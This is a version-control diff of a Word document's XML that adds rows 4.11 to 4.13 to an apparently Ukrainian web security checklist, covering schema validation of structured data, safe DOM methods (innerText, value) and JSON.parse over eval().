+            <w:tcW w:w="540" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:tabs>
+                <w:tab w:val="left" w:pos="916"/>
+                <w:tab w:val="left" w:pos="1832"/>
+                <w:tab w:val="left" w:pos="2748"/>
+                <w:tab w:val="left" w:pos="3664"/>
+                <w:tab w:val="left" w:pos="4580"/>
+                <w:tab w:val="left" w:pos="5496"/>
+                <w:tab w:val="left" w:pos="6412"/>
+                <w:tab w:val="left" w:pos="7328"/>
+                <w:tab w:val="left" w:pos="8244"/>
+                <w:tab w:val="left" w:pos="9160"/>
+                <w:tab w:val="left" w:pos="10076"/>
+                <w:tab w:val="left" w:pos="10992"/>
+                <w:tab w:val="left" w:pos="11908"/>
+                <w:tab w:val="left" w:pos="12824"/>
+                <w:tab w:val="left" w:pos="13740"/>
+                <w:tab w:val="left" w:pos="14656"/>
+              </w:tabs>
+              <w:spacing w:line="360" w:lineRule="auto"/>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:eastAsia="ru-RU"/>
+              </w:rPr>
+            </w:pPr>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="553" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:tabs>
+                <w:tab w:val="left" w:pos="916"/>
+                <w:tab w:val="left" w:pos="1832"/>
+                <w:tab w:val="left" w:pos="2748"/>
+                <w:tab w:val="left" w:pos="3664"/>
+                <w:tab w:val="left" w:pos="4580"/>
+                <w:tab w:val="left" w:pos="5496"/>
+                <w:tab w:val="left" w:pos="6412"/>
+                <w:tab w:val="left" w:pos="7328"/>
+                <w:tab w:val="left" w:pos="8244"/>
+                <w:tab w:val="left" w:pos="9160"/>
+                <w:tab w:val="left" w:pos="10076"/>
+                <w:tab w:val="left" w:pos="10992"/>
+                <w:tab w:val="left" w:pos="11908"/>
+                <w:tab w:val="left" w:pos="12824"/>
+                <w:tab w:val="left" w:pos="13740"/>
+                <w:tab w:val="left" w:pos="14656"/>
+              </w:tabs>
+              <w:spacing w:line="360" w:lineRule="auto"/>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:eastAsia="ru-RU"/>
+              </w:rPr>
+            </w:pPr>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="738" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:tabs>
+                <w:tab w:val="left" w:pos="916"/>
+                <w:tab w:val="left" w:pos="1832"/>
+                <w:tab w:val="left" w:pos="2748"/>
+                <w:tab w:val="left" w:pos="3664"/>
+                <w:tab w:val="left" w:pos="4580"/>
+                <w:tab w:val="left" w:pos="5496"/>
+                <w:tab w:val="left" w:pos="6412"/>
+                <w:tab w:val="left" w:pos="7328"/>
+                <w:tab w:val="left" w:pos="8244"/>
+                <w:tab w:val="left" w:pos="9160"/>
+                <w:tab w:val="left" w:pos="10076"/>
+                <w:tab w:val="left" w:pos="10992"/>
+                <w:tab w:val="left" w:pos="11908"/>
+                <w:tab w:val="left" w:pos="12824"/>
+                <w:tab w:val="left" w:pos="13740"/>
+                <w:tab w:val="left" w:pos="14656"/>
+              </w:tabs>
+              <w:spacing w:line="360" w:lineRule="auto"/>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:t>4.11</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="7110" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:tabs>
+                <w:tab w:val="left" w:pos="916"/>
+                <w:tab w:val="left" w:pos="1832"/>
+                <w:tab w:val="left" w:pos="2748"/>
+                <w:tab w:val="left" w:pos="3664"/>
+                <w:tab w:val="left" w:pos="4580"/>
+                <w:tab w:val="left" w:pos="5496"/>
+                <w:tab w:val="left" w:pos="6412"/>
+                <w:tab w:val="left" w:pos="7328"/>
+                <w:tab w:val="left" w:pos="8244"/>
+                <w:tab w:val="left" w:pos="9160"/>
+                <w:tab w:val="left" w:pos="10076"/>
+                <w:tab w:val="left" w:pos="10992"/>
+                <w:tab w:val="left" w:pos="11908"/>
+                <w:tab w:val="left" w:pos="12824"/>
+                <w:tab w:val="left" w:pos="13740"/>
+                <w:tab w:val="left" w:pos="14656"/>
+              </w:tabs>
+              <w:spacing w:line="360" w:lineRule="auto"/>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:eastAsia="ru-RU"/>
+              </w:rPr>
+            </w:pPr>
+            <w:proofErr w:type="gramStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:t xml:space="preserve">Переконайтеся в тому, що структуровані дані </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:t>строго</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> типізован</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:t>і</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> і звіряються</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> з</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> певною схемою, включаючи допустимі символи, довжини і структури (наприклад, номери кредитних карт або по телефону</w:t>
+            </w:r>
+            <w:proofErr w:type="gramEnd"/>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="630" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:tabs>
+                <w:tab w:val="left" w:pos="916"/>
+                <w:tab w:val="left" w:pos="1832"/>
+                <w:tab w:val="left" w:pos="2748"/>
+                <w:tab w:val="left" w:pos="3664"/>
+                <w:tab w:val="left" w:pos="4580"/>
+                <w:tab w:val="left" w:pos="5496"/>
+                <w:tab w:val="left" w:pos="6412"/>
+                <w:tab w:val="left" w:pos="7328"/>
+                <w:tab w:val="left" w:pos="8244"/>
+                <w:tab w:val="left" w:pos="9160"/>
+                <w:tab w:val="left" w:pos="10076"/>
+                <w:tab w:val="left" w:pos="10992"/>
+                <w:tab w:val="left" w:pos="11908"/>
+                <w:tab w:val="left" w:pos="12824"/>
+                <w:tab w:val="left" w:pos="13740"/>
+                <w:tab w:val="left" w:pos="14656"/>
+              </w:tabs>
+              <w:spacing w:line="360" w:lineRule="auto"/>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:eastAsia="ru-RU"/>
+              </w:rPr>
+            </w:pPr>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="540" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:tabs>
+                <w:tab w:val="left" w:pos="916"/>
+                <w:tab w:val="left" w:pos="1832"/>
+                <w:tab w:val="left" w:pos="2748"/>
+                <w:tab w:val="left" w:pos="3664"/>
+                <w:tab w:val="left" w:pos="4580"/>
+                <w:tab w:val="left" w:pos="5496"/>
+                <w:tab w:val="left" w:pos="6412"/>
+                <w:tab w:val="left" w:pos="7328"/>
+                <w:tab w:val="left" w:pos="8244"/>
+                <w:tab w:val="left" w:pos="9160"/>
+                <w:tab w:val="left" w:pos="10076"/>
+                <w:tab w:val="left" w:pos="10992"/>
+                <w:tab w:val="left" w:pos="11908"/>
+                <w:tab w:val="left" w:pos="12824"/>
+                <w:tab w:val="left" w:pos="13740"/>
+                <w:tab w:val="left" w:pos="14656"/>
+              </w:tabs>
+              <w:spacing w:line="360" w:lineRule="auto"/>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:eastAsia="ru-RU"/>
+              </w:rPr>
+            </w:pPr>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="553" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:tabs>
+                <w:tab w:val="left" w:pos="916"/>
+                <w:tab w:val="left" w:pos="1832"/>
+                <w:tab w:val="left" w:pos="2748"/>
+                <w:tab w:val="left" w:pos="3664"/>
+                <w:tab w:val="left" w:pos="4580"/>
+                <w:tab w:val="left" w:pos="5496"/>
+                <w:tab w:val="left" w:pos="6412"/>
+                <w:tab w:val="left" w:pos="7328"/>
+                <w:tab w:val="left" w:pos="8244"/>
+                <w:tab w:val="left" w:pos="9160"/>
+                <w:tab w:val="left" w:pos="10076"/>
+                <w:tab w:val="left" w:pos="10992"/>
+                <w:tab w:val="left" w:pos="11908"/>
+                <w:tab w:val="left" w:pos="12824"/>
+                <w:tab w:val="left" w:pos="13740"/>
+                <w:tab w:val="left" w:pos="14656"/>
+              </w:tabs>
+              <w:spacing w:line="360" w:lineRule="auto"/>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:eastAsia="ru-RU"/>
+              </w:rPr>
+            </w:pPr>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="738" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:tabs>
+                <w:tab w:val="left" w:pos="916"/>
+                <w:tab w:val="left" w:pos="1832"/>
+                <w:tab w:val="left" w:pos="2748"/>
+                <w:tab w:val="left" w:pos="3664"/>
+                <w:tab w:val="left" w:pos="4580"/>
+                <w:tab w:val="left" w:pos="5496"/>
+                <w:tab w:val="left" w:pos="6412"/>
+                <w:tab w:val="left" w:pos="7328"/>
+                <w:tab w:val="left" w:pos="8244"/>
+                <w:tab w:val="left" w:pos="9160"/>
+                <w:tab w:val="left" w:pos="10076"/>
+                <w:tab w:val="left" w:pos="10992"/>
+                <w:tab w:val="left" w:pos="11908"/>
+                <w:tab w:val="left" w:pos="12824"/>
+                <w:tab w:val="left" w:pos="13740"/>
+                <w:tab w:val="left" w:pos="14656"/>
+              </w:tabs>
+              <w:spacing w:line="360" w:lineRule="auto"/>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:t>4.12</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="7110" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:tabs>
+                <w:tab w:val="left" w:pos="916"/>
+                <w:tab w:val="left" w:pos="1832"/>
+                <w:tab w:val="left" w:pos="2748"/>
+                <w:tab w:val="left" w:pos="3664"/>
+                <w:tab w:val="left" w:pos="4580"/>
+                <w:tab w:val="left" w:pos="5496"/>
+                <w:tab w:val="left" w:pos="6412"/>
+                <w:tab w:val="left" w:pos="7328"/>
+                <w:tab w:val="left" w:pos="8244"/>
+                <w:tab w:val="left" w:pos="9160"/>
+                <w:tab w:val="left" w:pos="10076"/>
+                <w:tab w:val="left" w:pos="10992"/>
+                <w:tab w:val="left" w:pos="11908"/>
+                <w:tab w:val="left" w:pos="12824"/>
+                <w:tab w:val="left" w:pos="13740"/>
+                <w:tab w:val="left" w:pos="14656"/>
+              </w:tabs>
+              <w:spacing w:line="360" w:lineRule="auto"/>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:t>Переконайтеся в тому, що дані, що передаються з одного контексту</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:t>DOM</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> в інший</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:t>, використовуют</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> безпечні методи </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:t>JavaScript</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:t xml:space="preserve">, такі як </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:t>InnerText</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> і </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:t>val</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
                 <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
               </w:rPr>
-            </w:pPr>
+              <w:t>ue</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:t>.</w:t>
+            </w:r>
           </w:p>
         </w:tc>
         <w:tc>
@@ -18589,7 +19035,7 @@
                 <w:color w:val="212121"/>
                 <w:sz w:val="28"/>
                 <w:szCs w:val="28"/>
-                <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
+                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
               </w:rPr>
             </w:pPr>
           </w:p>
@@ -18624,7 +19070,7 @@
                 <w:color w:val="212121"/>
                 <w:sz w:val="28"/>
                 <w:szCs w:val="28"/>
-                <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
+                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
               </w:rPr>
             </w:pPr>
           </w:p>
@@ -18659,7 +19105,441 @@
                 <w:color w:val="212121"/>
                 <w:sz w:val="28"/>
                 <w:szCs w:val="28"/>
-                <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
+                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+              </w:rPr>
+            </w:pPr>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="738" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:tabs>
+                <w:tab w:val="left" w:pos="916"/>
+                <w:tab w:val="left" w:pos="1832"/>
+                <w:tab w:val="left" w:pos="2748"/>
+                <w:tab w:val="left" w:pos="3664"/>
+                <w:tab w:val="left" w:pos="4580"/>
+                <w:tab w:val="left" w:pos="5496"/>
+                <w:tab w:val="left" w:pos="6412"/>
+                <w:tab w:val="left" w:pos="7328"/>
+                <w:tab w:val="left" w:pos="8244"/>
+                <w:tab w:val="left" w:pos="9160"/>
+                <w:tab w:val="left" w:pos="10076"/>
+                <w:tab w:val="left" w:pos="10992"/>
+                <w:tab w:val="left" w:pos="11908"/>
+                <w:tab w:val="left" w:pos="12824"/>
+                <w:tab w:val="left" w:pos="13740"/>
+                <w:tab w:val="left" w:pos="14656"/>
+              </w:tabs>
+              <w:spacing w:line="360" w:lineRule="auto"/>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:t>4.13</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="7110" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:tabs>
+                <w:tab w:val="left" w:pos="916"/>
+                <w:tab w:val="left" w:pos="1832"/>
+                <w:tab w:val="left" w:pos="2748"/>
+                <w:tab w:val="left" w:pos="3664"/>
+                <w:tab w:val="left" w:pos="4580"/>
+                <w:tab w:val="left" w:pos="5496"/>
+                <w:tab w:val="left" w:pos="6412"/>
+                <w:tab w:val="left" w:pos="7328"/>
+                <w:tab w:val="left" w:pos="8244"/>
+                <w:tab w:val="left" w:pos="9160"/>
+                <w:tab w:val="left" w:pos="10076"/>
+                <w:tab w:val="left" w:pos="10992"/>
+                <w:tab w:val="left" w:pos="11908"/>
+                <w:tab w:val="left" w:pos="12824"/>
+                <w:tab w:val="left" w:pos="13740"/>
+                <w:tab w:val="left" w:pos="14656"/>
+              </w:tabs>
+              <w:spacing w:line="360" w:lineRule="auto"/>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:t>Перевірка при аналізі JSON в браузерах, що JSON.parse використовується для розбору JSON на стороні клієнта. Не використовуйте Eval () для розбору JSON на стороні клієнта.</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="630" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:tabs>
+                <w:tab w:val="left" w:pos="916"/>
+                <w:tab w:val="left" w:pos="1832"/>
+                <w:tab w:val="left" w:pos="2748"/>
+                <w:tab w:val="left" w:pos="3664"/>
+                <w:tab w:val="left" w:pos="4580"/>
+                <w:tab w:val="left" w:pos="5496"/>
+                <w:tab w:val="left" w:pos="6412"/>
+                <w:tab w:val="left" w:pos="7328"/>
+                <w:tab w:val="left" w:pos="8244"/>
+                <w:tab w:val="left" w:pos="9160"/>
+                <w:tab w:val="left" w:pos="10076"/>
+                <w:tab w:val="left" w:pos="10992"/>
+                <w:tab w:val="left" w:pos="11908"/>
+                <w:tab w:val="left" w:pos="12824"/>
+                <w:tab w:val="left" w:pos="13740"/>
+                <w:tab w:val="left" w:pos="14656"/>
+              </w:tabs>
+              <w:spacing w:line="360" w:lineRule="auto"/>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+              </w:rPr>
+            </w:pPr>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="540" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:tabs>
+                <w:tab w:val="left" w:pos="916"/>
+                <w:tab w:val="left" w:pos="1832"/>
+                <w:tab w:val="left" w:pos="2748"/>
+                <w:tab w:val="left" w:pos="3664"/>
+                <w:tab w:val="left" w:pos="4580"/>
+                <w:tab w:val="left" w:pos="5496"/>
+                <w:tab w:val="left" w:pos="6412"/>
+                <w:tab w:val="left" w:pos="7328"/>
+                <w:tab w:val="left" w:pos="8244"/>
+                <w:tab w:val="left" w:pos="9160"/>
+                <w:tab w:val="left" w:pos="10076"/>
+                <w:tab w:val="left" w:pos="10992"/>
+                <w:tab w:val="left" w:pos="11908"/>
+                <w:tab w:val="left" w:pos="12824"/>
+                <w:tab w:val="left" w:pos="13740"/>
+                <w:tab w:val="left" w:pos="14656"/>
+              </w:tabs>
+              <w:spacing w:line="360" w:lineRule="auto"/>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+              </w:rPr>
+            </w:pPr>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="553" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:tabs>
+                <w:tab w:val="left" w:pos="916"/>
+                <w:tab w:val="left" w:pos="1832"/>
+                <w:tab w:val="left" w:pos="2748"/>
+                <w:tab w:val="left" w:pos="3664"/>
+                <w:tab w:val="left" w:pos="4580"/>
+                <w:tab w:val="left" w:pos="5496"/>
+                <w:tab w:val="left" w:pos="6412"/>
+                <w:tab w:val="left" w:pos="7328"/>
+                <w:tab w:val="left" w:pos="8244"/>
+                <w:tab w:val="left" w:pos="9160"/>
+                <w:tab w:val="left" w:pos="10076"/>
+                <w:tab w:val="left" w:pos="10992"/>
